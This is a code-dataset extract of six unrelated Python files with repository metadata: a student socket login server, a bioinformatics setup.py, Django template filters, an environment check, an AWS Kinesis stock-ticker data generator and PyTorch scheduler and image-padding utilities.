5dfa81c4561263d9017352c96e5be1e9f43f9cf3
2,220
py
Python
Assignment-1/Code/server3.py
pankajk22/Computer-Networks-Assignments
5c227ef59c31ab52cde160568242dbbc84482bc5
[ "MIT" ]
null
null
null
Assignment-1/Code/server3.py
pankajk22/Computer-Networks-Assignments
5c227ef59c31ab52cde160568242dbbc84482bc5
[ "MIT" ]
null
null
null
Assignment-1/Code/server3.py
pankajk22/Computer-Networks-Assignments
5c227ef59c31ab52cde160568242dbbc84482bc5
[ "MIT" ]
null
null
null
import socket import csv import traceback import threading s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) usrpass={} def openfile(): filename="login_credentials.csv" with open(filename,'r')as csvfile: csv_file = csv.reader(csvfile, delimiter=",") for col in csv_file: usrpass[col[0]]=col[1] usrpass.pop("Username") #print(usrpass) ihost=socket.gethostname() host=socket.gethostbyname(ihost) ihost=socket.gethostname() host=socket.gethostbyname(ihost) iport=[] hostfile="host.csv" with open(hostfile,'r')as host_file: csv_hfile = csv.reader(host_file, delimiter=",") for row in csv_hfile: iport.append(row[1]) port=int(iport[4]) def socketbind(): try: s.bind(('',port)) print("Bind with host at port number : "+str(port)) s.listen(10) print("Socket is listening!!") except socket.error as msg: print("Error in Binding: "+ str(msg)+"\n Retrying....") socketbind() def socketaccept(): conn,add=s.accept() print("connection is established with IP : "+str(add[0])+" and Port Number : "+str(add[1])) conn.send(bytes("1","utf-8")) conversation(conn) conn.close() def conversation(conn): while True: username=str(conn.recv(1024),"utf-8") password=str(conn.recv(1024),"utf-8") res=checkpass(username,password) if res==1: print("Valid Password!") conn.send(bytes("1","utf-8")) conn.send(bytes("1","utf-8")) else: conn.send(bytes("-1","utf-8")) conn.send(bytes("-1","utf-8")) # def checkusr(username): # if username in usrpass: # return 1 # else: # print("Invalid Username") # return -1 def checkpass(username,password): if usrpass[username]==password: return 1 else: print("Invalid Password") return -1 def main(): openfile() socketbind() socketaccept() # count=0 # while (count<6): # new_thread=threading.Thread(target =socketaccept) # new_thread.start() # count=count+1 main()
23.368421
95
0.578378
271
2,220
4.697417
0.346863
0.021995
0.05106
0.054988
0.21524
0.179104
0.135114
0.056559
0.056559
0.056559
0
0.02225
0.271171
2,220
95
96
23.368421
0.764524
0.119369
0
0.209677
0
0
0.131173
0.010802
0
0
0
0
0
1
0.096774
false
0.145161
0.064516
0
0.193548
0.096774
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
b908698cf79967eaadf3686141afa64182f22f9d
4,756
py
Python
setup.py
UdoGi/dark-matter
3d49e89fa5e81f83144119f6216c5774176d203b
[ "MIT" ]
null
null
null
setup.py
UdoGi/dark-matter
3d49e89fa5e81f83144119f6216c5774176d203b
[ "MIT" ]
null
null
null
setup.py
UdoGi/dark-matter
3d49e89fa5e81f83144119f6216c5774176d203b
[ "MIT" ]
null
null
null
#!/usr/bin/env python from setuptools import setup # Modified from http://stackoverflow.com/questions/2058802/ # how-can-i-get-the-version-defined-in-setup-py-setuptools-in-my-package def version(): import os import re init = os.path.join('dark', '__init__.py') with open(init) as fp: initData = fp.read() match = re.search(r"^__version__ = ['\"]([^'\"]+)['\"]", initData, re.M) if match: return match.group(1) else: raise RuntimeError('Unable to find version string in %r.' % init) # Explicitly list bin scripts to be installed, seeing as I have a few local # bin files that are not (yet) part of the distribution. scripts = [ 'bin/aa-info.py', 'bin/aa-to-dna.py', 'bin/aa-to-properties.py', 'bin/adaptor-distances.py', 'bin/alignment-panel-civ.py', 'bin/alignments-per-read.py', 'bin/bit-score-to-e-value.py', 'bin/cat-json-blast-records.py', 'bin/check-fasta-json-blast-consistency.py', 'bin/codon-distance.py', 'bin/compare-consensuses.py', 'bin/compare-sequences.py', 'bin/convert-blast-xml-to-json.py', 'bin/convert-diamond-to-json.py', 'bin/convert-diamond-to-sam.py', 'bin/convert-sam-to-fastq.sh', 'bin/create-newick-relabeling-output.py', 'bin/dark-matter-version.py', 'bin/describe-protein-database.py', 'bin/dna-to-aa.py', 'bin/download-genbank.sh', 'bin/e-value-to-bit-score.py', 'bin/extract-ORFs.py', 'bin/fasta-base-indices.py', 'bin/fasta-count.py', 'bin/fasta-diff.sh', 'bin/fasta-identity-table.py', 'bin/fasta-ids.py', 'bin/fasta-join.py', 'bin/fasta-lengths.py', 'bin/fasta-sequences.py', 'bin/fasta-sort.py', 'bin/fasta-split-by-id.py', 'bin/fasta-subset.py', 'bin/fasta-subtraction.py', 'bin/fasta-to-phylip.py', 'bin/fasta-variable-sites.py', 'bin/filter-fasta-by-complexity.py', 'bin/filter-fasta-by-taxonomy.py', 'bin/filter-fasta.py', 'bin/filter-hits-to-fasta.py', 'bin/filter-reads-alignments.py', 'bin/filter-sam.py', 'bin/find-hits.py', 'bin/format-fasta.py', 'bin/genome-protein-summary.py', 'bin/get-features.py', 'bin/get-hosts.py', 'bin/get-reads.py', 
'bin/get-taxonomy.py', 'bin/graph-evalues.py', 'bin/local-align.py', 'bin/make-consensus.py', 'bin/make-fasta-database.py', 'bin/make-protein-database.py', 'bin/ncbi-fetch-id.py', 'bin/newick-to-ascii.py', 'bin/noninteractive-alignment-panel.py', 'bin/parse-genbank-flat-file.py', 'bin/position-summary.py', 'bin/pre-commit.sh', 'bin/print-blast-xml-for-derek.py', 'bin/print-blast-xml.py', 'bin/print-read-lengths.py', 'bin/proteins-to-pathogens.py', 'bin/proteins-to-pathogens-civ.py', 'bin/randomize-fasta.py', 'bin/read-blast-json.py', 'bin/read-blast-xml.py', 'bin/relabel-newick-tree.py', 'bin/run-bwa.py', 'bin/run-bowtie2.py', 'bin/sam-coverage.py', 'bin/sam-coverage-depth.py', 'bin/sam-to-fasta-alignment.py', 'bin/sam-reference-read-counts.py', 'bin/sam-references.py', 'bin/sff-to-fastq.py', 'bin/split-fasta-by-adaptors.py', 'bin/subset-protein-database.py', 'bin/summarize-fasta-bases.py', 'bin/summarize-reads.py', 'bin/trim-primers.py', 'bin/trim-reads.py', 'bin/write-htcondor-job-spec.py', ] setup(name='dark-matter', version=version(), packages=['dark', 'dark.blast', 'dark.diamond', 'dark.civ'], url='https://github.com/acorg/dark-matter', download_url='https://github.com/acorg/dark-matter', author='Terry Jones, Barbara Muehlemann, Tali Veith, Sophie Mathias', author_email='tcj25@cam.ac.uk', keywords=['virus discovery'], classifiers=[ 'Programming Language :: Python :: 2.7', 'Programming Language :: Python :: 3', 'Development Status :: 4 - Beta', 'Intended Audience :: Developers', 'License :: OSI Approved :: MIT License', 'Operating System :: OS Independent', 'Topic :: Software Development :: Libraries :: Python Modules', ], license='MIT', description='Python classes for working with genetic sequence data', scripts=scripts, install_requires=[ 'biopython>=1.71', 'bz2file>=0.98', 'Cython>=0.29.16', 'ipython>=3.1.0', 'matplotlib>=1.4.3', 'mysql-connector-python==8.0.11', 'numpy>=1.14.2', 'pysam>=0.15.2', 'pyfaidx>=0.4.8.4', 'pyzmq>=14.3.1', 'requests>=2.18.4', 
'cachetools>=3.1.0', 'simplejson>=3.5.3', 'six>=1.11.0', ])
31.919463
75
0.603238
664
4,756
4.304217
0.399096
0.139958
0.045486
0.020994
0.069979
0.040588
0.040588
0
0
0
0
0.017701
0.204163
4,756
148
76
32.135135
0.737384
0.058452
0
0
0
0
0.637156
0.345629
0
0
0
0
0
1
0.007353
false
0
0.022059
0
0.036765
0.022059
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
b9093a206a1a67140ea6cc8087c03166f895cb37
1,732
py
Python
authenticationApp/templatetags/timetags.py
FilipBali/VirtualPortfolio-WebApplication
9236509205e37c2c682b7b2f518f5794a94fd178
[ "MIT" ]
null
null
null
authenticationApp/templatetags/timetags.py
FilipBali/VirtualPortfolio-WebApplication
9236509205e37c2c682b7b2f518f5794a94fd178
[ "MIT" ]
null
null
null
authenticationApp/templatetags/timetags.py
FilipBali/VirtualPortfolio-WebApplication
9236509205e37c2c682b7b2f518f5794a94fd178
[ "MIT" ]
null
null
null
# ====================================================================================================================== # Fakulta informacnich technologii VUT v Brne # Bachelor thesis # Author: Filip Bali (xbalif00) # License: MIT # ====================================================================================================================== from django import template import datetime import time from portfolioApp.models import NotificationEvent register = template.Library() import pandas as pd def print_timestamp(timestamp): return time.strftime('%Y-%m-%d'.format(timestamp%1000), time.gmtime(timestamp/1000.0)) def print_timestamp_analysis(timestamp): return str(timestamp.year) + '-' + str(timestamp.month) +'-' + str(timestamp.day) def print_timestamp_notifications(timestamp): return str(timestamp.year) + '-' + str(timestamp.month) +'-' + str(timestamp.day) def print_notification_text(type): if type == 1: return 'At a price change equal/above/below' elif type == 2: return 'Percentage increase current price' elif type == 3: return 'Percentage decrease current price' def print_symbol_notifications(notification_id): object = NotificationEvent.objects.get(id=notification_id) symbol = str(object.company.symbol) return symbol def print_type_notifications(notification_type): if notification_type == 1: return 'Interday' elif notification_type == 2: return 'Intraday' register.filter(print_timestamp) register.filter(print_timestamp_analysis) register.filter(print_timestamp_notifications) register.filter(print_notification_text) register.filter(print_symbol_notifications) register.filter(print_type_notifications)
34.64
120
0.65127
181
1,732
6.082873
0.40884
0.043597
0.103542
0.076294
0.128974
0.128974
0.128974
0.128974
0.128974
0.128974
0
0.010589
0.127598
1,732
50
121
34.64
0.718068
0.196305
0
0.058824
0
0
0.093074
0
0
0
0
0
0
1
0.176471
false
0
0.147059
0.088235
0.588235
0.352941
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
1
b90f4e751b3217015ecc06286993d45ab12fc397
405
py
Python
{{ cookiecutter.repo_name }}/tests/test_environment.py
FrancisMudavanhu/cookiecutter-data-science
be766817a7399ccd714bf03d085609985fa7313a
[ "MIT" ]
null
null
null
{{ cookiecutter.repo_name }}/tests/test_environment.py
FrancisMudavanhu/cookiecutter-data-science
be766817a7399ccd714bf03d085609985fa7313a
[ "MIT" ]
null
null
null
{{ cookiecutter.repo_name }}/tests/test_environment.py
FrancisMudavanhu/cookiecutter-data-science
be766817a7399ccd714bf03d085609985fa7313a
[ "MIT" ]
null
null
null
import sys REQUIRED_PYTHON = "python3" required_major = 3 def main(): system_major = sys.version_info.major if system_major != required_major: raise TypeError( f"This project requires Python {required_major}." f" Found: Python {sys.version}") else: print(">>> Development environment passes all tests!") if __name__ == '__main__': main()
19.285714
62
0.632099
46
405
5.23913
0.608696
0.161826
0
0
0
0
0
0
0
0
0
0.006711
0.264198
405
20
63
20.25
0.802013
0
0
0
0
0
0.330864
0
0
0
0
0
0
1
0.076923
false
0.076923
0.076923
0
0.153846
0.076923
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
b90f54d52259df5370c156bb89c17f8368958017
1,845
py
Python
documents/aws-doc-sdk-examples/python/example_code/kda/kda-python-datagenerator-stockticker.py
siagholami/aws-documentation
2d06ee9011f3192b2ff38c09f04e01f1ea9e0191
[ "CC-BY-4.0" ]
5
2021-08-13T09:20:58.000Z
2021-12-16T22:13:54.000Z
documents/aws-doc-sdk-examples/python/example_code/kda/kda-python-datagenerator-stockticker.py
siagholami/aws-documentation
2d06ee9011f3192b2ff38c09f04e01f1ea9e0191
[ "CC-BY-4.0" ]
null
null
null
documents/aws-doc-sdk-examples/python/example_code/kda/kda-python-datagenerator-stockticker.py
siagholami/aws-documentation
2d06ee9011f3192b2ff38c09f04e01f1ea9e0191
[ "CC-BY-4.0" ]
null
null
null
# snippet-comment:[These are tags for the AWS doc team's sample catalog. Do not remove.] # snippet-sourcedescription:[kda-python-datagenerator-stockticker.py demonstrates how to generate sample data for Amazon Kinesis Data Analytics SQL applications.] # snippet-service:[kinesisanalytics] # snippet-keyword:[Python] # snippet-sourcesyntax:[python] # snippet-sourcesyntax:[python] # snippet-keyword:[Amazon Kinesis Data Analytics] # snippet-keyword:[Code Sample] # snippet-sourcetype:[full-example] # snippet-sourcedate:[2019-01-29] # snippet-sourceauthor:[fletpatr (AWS)] # Copyright 2010-2019 Amazon.com, Inc. or its affiliates. All Rights Reserved. # # This file is licensed under the Apache License, Version 2.0 (the "License"). # You may not use this file except in compliance with the License. A copy of the # License is located at # # http://aws.amazon.com/apache2.0/ # # This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS # OF ANY KIND, either express or implied. See the License for the specific # language governing permissions and limitations under the License. # snippet-start:[kinesisanalytics.python.datagenerator.stockticker] import json import boto3 import random import datetime kinesis = boto3.client('kinesis') def getReferrer(): data = {} now = datetime.datetime.now() str_now = now.isoformat() data['EVENT_TIME'] = str_now data['TICKER'] = random.choice(['AAPL', 'AMZN', 'MSFT', 'INTC', 'TBV']) price = random.random() * 100 data['PRICE'] = round(price, 2) return data while True: data = json.dumps(getReferrer()) print(data) kinesis.put_record( StreamName="ExampleInputStream", Data=data, PartitionKey="partitionkey") # snippet-end:[kinesisanalytics.python.datagenerator.stockticker]
34.811321
162
0.720325
233
1,845
5.686695
0.579399
0.037736
0.067925
0.039245
0.047547
0
0
0
0
0
0
0.016927
0.16748
1,845
52
163
35.480769
0.845703
0.642276
0
0
1
0
0.121643
0
0
0
0
0
0
1
0.047619
false
0
0.190476
0
0.285714
0.047619
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
f8d46f993d25bd7f9f34660f23bf18928f5a3963
5,672
py
Python
module/classification_package/src/utils.py
fishial/Object-Detection-Model
4792f65ea785156a8e240d9cdbbc0c9d013ea0bb
[ "CC0-1.0" ]
1
2022-01-03T14:00:17.000Z
2022-01-03T14:00:17.000Z
module/classification_package/src/utils.py
fishial/Object-Detection-Model
4792f65ea785156a8e240d9cdbbc0c9d013ea0bb
[ "CC0-1.0" ]
null
null
null
module/classification_package/src/utils.py
fishial/Object-Detection-Model
4792f65ea785156a8e240d9cdbbc0c9d013ea0bb
[ "CC0-1.0" ]
1
2021-12-21T09:50:53.000Z
2021-12-21T09:50:53.000Z
import numpy as np
import logging
import numbers
import torch
import math
import json
import sys

from torch.optim.lr_scheduler import LambdaLR
from torchvision.transforms.functional import pad


class AverageMeter(object):
    """Computes and stores the average and current value."""

    def __init__(self):
        self.reset()

    def reset(self):
        """Clear the current value, running sum, sample count, and mean."""
        self.val = 0
        self.avg = 0
        self.sum = 0
        self.count = 0

    def update(self, val, n=1):
        """Record ``val`` observed ``n`` times and refresh the running mean."""
        self.val = val
        self.sum += val * n
        self.count += n
        self.avg = self.sum / self.count


class ConstantLRSchedule(LambdaLR):
    """Constant learning rate schedule (multiplier fixed at 1.0)."""

    def __init__(self, optimizer, last_epoch=-1):
        super(ConstantLRSchedule, self).__init__(optimizer, lambda _: 1.0, last_epoch=last_epoch)


class WarmupConstantSchedule(LambdaLR):
    """Linear warmup and then constant.

    Linearly increases the learning rate multiplier from 0 to 1 over
    ``warmup_steps`` training steps, then keeps it at 1 thereafter.
    """

    def __init__(self, optimizer, warmup_steps, last_epoch=-1):
        self.warmup_steps = warmup_steps
        super(WarmupConstantSchedule, self).__init__(optimizer, self.lr_lambda, last_epoch=last_epoch)

    def lr_lambda(self, step):
        if step < self.warmup_steps:
            # max(1.0, ...) guards against division by zero when warmup_steps == 0.
            return float(step) / float(max(1.0, self.warmup_steps))
        return 1.


class WarmupLinearSchedule(LambdaLR):
    """Linear warmup and then linear decay.

    Linearly increases the learning rate multiplier from 0 to 1 over
    ``warmup_steps`` training steps, then linearly decreases it from 1 to 0
    over the remaining ``t_total - warmup_steps`` steps.
    """

    def __init__(self, optimizer, warmup_steps, t_total, last_epoch=-1):
        self.warmup_steps = warmup_steps
        self.t_total = t_total
        super(WarmupLinearSchedule, self).__init__(optimizer, self.lr_lambda, last_epoch=last_epoch)

    def lr_lambda(self, step):
        if step < self.warmup_steps:
            return float(step) / float(max(1, self.warmup_steps))
        # Clamp at 0.0 so the multiplier never goes negative past t_total.
        return max(0.0, float(self.t_total - step) / float(max(1.0, self.t_total - self.warmup_steps)))


class WarmupCosineSchedule(LambdaLR):
    """Linear warmup and then cosine decay.

    Linearly increases the learning rate multiplier from 0 to 1 over
    ``warmup_steps`` training steps, then decreases it from 1 to 0 over the
    remaining ``t_total - warmup_steps`` steps following a cosine curve.
    If ``cycles`` (default 0.5) differs from the default, the multiplier
    follows a cosine function after warmup.
    """

    def __init__(self, optimizer, warmup_steps, t_total, cycles=.5, last_epoch=-1):
        self.warmup_steps = warmup_steps
        self.t_total = t_total
        self.cycles = cycles
        super(WarmupCosineSchedule, self).__init__(optimizer, self.lr_lambda, last_epoch=last_epoch)

    def lr_lambda(self, step):
        if step < self.warmup_steps:
            return float(step) / float(max(1.0, self.warmup_steps))
        # Fraction of the post-warmup phase completed, in [0, 1].
        progress = float(step - self.warmup_steps) / float(max(1, self.t_total - self.warmup_steps))
        return max(0.0, 0.5 * (1. + math.cos(math.pi * float(self.cycles) * 2.0 * progress)))


def get_padding(image):
    """Compute (left, top, right, bottom) padding that makes ``image`` square.

    ``image`` is expected to be a PIL Image (it must expose ``.size`` as
    (width, height)). Odd differences are split so the extra pixel goes on
    the left/top side.
    """
    w, h = image.size
    max_wh = np.max([w, h])
    h_padding = (max_wh - w) / 2
    v_padding = (max_wh - h) / 2
    # When the padding is fractional (odd difference), round left/top up
    # and right/bottom down so the total matches exactly.
    l_pad = h_padding if h_padding % 1 == 0 else h_padding + 0.5
    t_pad = v_padding if v_padding % 1 == 0 else v_padding + 0.5
    r_pad = h_padding if h_padding % 1 == 0 else h_padding - 0.5
    b_pad = v_padding if v_padding % 1 == 0 else v_padding - 0.5
    padding = (int(l_pad), int(t_pad), int(r_pad), int(b_pad))
    return padding


class NewPad(object):
    """Transform that pads a PIL image to a square using ``get_padding``."""

    def __init__(self, fill=0, padding_mode='constant'):
        assert isinstance(fill, (numbers.Number, str, tuple))
        assert padding_mode in ['constant', 'edge', 'reflect', 'symmetric']
        self.fill = fill
        self.padding_mode = padding_mode

    def __call__(self, img):
        """
        Args:
            img (PIL Image): Image to be padded.

        Returns:
            PIL Image: Padded image.
        """
        return pad(img, get_padding(img), self.fill, self.padding_mode)

    def __repr__(self):
        # BUGFIX: the original format string had three placeholders
        # ({0}, {1}, {2}) but only two arguments, so calling repr() raised
        # IndexError. The placeholders now match the two formatted values.
        return self.__class__.__name__ + '(fill={0}, padding_mode={1})'.\
            format(self.fill, self.padding_mode)


def find_device():
    """Return the first CUDA device if available, else the CPU device."""
    device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
    return device


def read_json(data):
    """Load and return JSON content from the file path ``data``."""
    with open(data) as f:
        return json.load(f)


def save_json(data, path):
    """Serialize ``data`` as JSON to ``path`` (UTF-8)."""
    with open(path, 'w', encoding='utf-8') as f:
        json.dump(data, f)


def setup_logger():
    """Return the 'train' logger at INFO level, adding a stdout handler once."""
    logger = logging.getLogger('train')
    logger.setLevel(logging.INFO)
    # Only attach a handler the first time so repeated calls do not
    # duplicate log lines.
    if len(logger.handlers) == 0:
        formatter = logging.Formatter('%(asctime)s | %(message)s')
        ch = logging.StreamHandler(stream=sys.stdout)
        ch.setFormatter(formatter)
        logger.addHandler(ch)
    return logger


def adjust_learning_rate(optimizer, epoch, lr):
    """Sets the learning rate to the initial LR decayed by 10 every 30 epochs"""
    lr = lr * (0.1 ** (epoch // 30))
    for param_group in optimizer.param_groups:
        param_group['lr'] = lr


def save_checkpoint(model, path):
    """Save ``model``'s state dict to ``path``."""
    torch.save(model.state_dict(), path)


def reverse_norm_image(image):
    """Undo ImageNet-style normalization and return an HWC numpy array.

    ``image`` is assumed to be a CHW tensor normalized with the ImageNet
    mean/std used below — TODO confirm against the caller's transform.
    """
    MEAN = torch.tensor([0.485, 0.456, 0.406])
    STD = torch.tensor([0.229, 0.224, 0.225])
    reverse_image = image * STD[:, None, None] + MEAN[:, None, None]
    return reverse_image.permute(1, 2, 0).cpu().numpy()
33.761905
117
0.653738
799
5,672
4.439299
0.239049
0.074429
0.050747
0.035523
0.366789
0.343953
0.315478
0.290668
0.259656
0.249507
0
0.023662
0.232546
5,672
168
118
33.761905
0.791179
0.175599
0
0.125
0
0
0.027409
0
0
0
0
0
0.019231
1
0.201923
false
0
0.086538
0.009615
0.471154
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
0
0
1